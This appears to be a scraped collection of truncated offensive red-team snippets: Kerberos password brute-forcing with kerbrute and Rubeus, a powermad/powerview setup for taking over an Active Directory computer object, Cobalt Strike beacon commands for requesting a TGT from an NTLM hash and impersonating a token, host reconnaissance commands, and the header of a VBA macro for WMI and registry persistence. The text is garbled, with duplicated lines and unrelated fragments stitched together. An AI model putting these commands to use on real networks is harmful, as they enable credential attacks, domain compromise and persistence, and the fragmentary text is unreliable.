With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the | |
# function is called, it will resume after where it last yielded. | |
# | |
sub stuffToDo { | |
# Tasks for first checkin |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
# Before first PowerShell usage you might have to adapt the policies | |
# Get-ExecutionPolicy -List | |
# Set-ExecutionPolicy Unrestricted -Scope CurrentUser | |
# -------------------------------------------------------------------------------- | |
# This setup is only necessary once | |
# Insert the password into the empty string below and run script | |
# powershell creates a text file with the (encrypted credentials, Windows Data Protection API) | |
# then the watchdog acesses it... | |
#$secureStringPwd = "test" | ConvertTo-SecureString -AsPlainText -Force |
##### IF ELEVATED: | |
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter |
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
#openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
import BaseHTTPServer, SimpleHTTPServer, logging | |
import ssl | |
import sys | |
import cgi | |
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
def do_GET(self): | |
#logging.error(self.headers) |
#!/usr/bin/python | |
# | |
# import masscan output and run an nmap scan on the results | |
# | |
import sys | |
import argparse | |
from libnmap.parser import NmapParser, NmapParserException | |
from libnmap.process import NmapProcess |
' | |
' SYNOPSIS: | |
' This macro implements two windows persistence methods: | |
' - WMI Event Filter object creation | |
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64 | |
' | |
' WMI Persistence method as originally presented by SEADADDY malware | |
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
' and further documented by Matt Graeber. | |
' |